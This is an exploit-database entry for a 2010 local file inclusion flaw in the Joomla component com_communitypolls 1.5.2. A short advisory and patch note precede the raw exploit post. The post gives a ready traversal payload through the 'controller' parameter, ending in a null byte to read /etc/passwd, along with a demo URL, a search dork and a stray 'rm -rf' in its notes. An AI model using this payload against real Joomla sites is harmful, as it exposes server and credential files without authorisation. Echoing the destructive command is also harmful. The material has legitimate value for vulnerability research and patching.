Joomla Component com_communitypolls LFI Vulnerability

vendor:

Community Polls

by:

kaMtiEz

7,5

CVSS

HIGH

LFI

CWE

Product Name: Community Polls

Affected Version From: 1.5.2

Affected Version To: 1.5.2

Patch Exists: YES

Related CWE: N/A

CPE: a:corejoomla:community_polls

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_communitypolls LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component com_communitypolls. An attacker can exploit this vulnerability to read sensitive files from the server. The vulnerable parameter is ‘controller’ which can be manipulated to include local files.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the component to the latest version.

Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component com_communitypolls LFI Vulnerability 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 16 February, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected 

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00

[ d3m0 ]

http://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Rawk !
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] e0f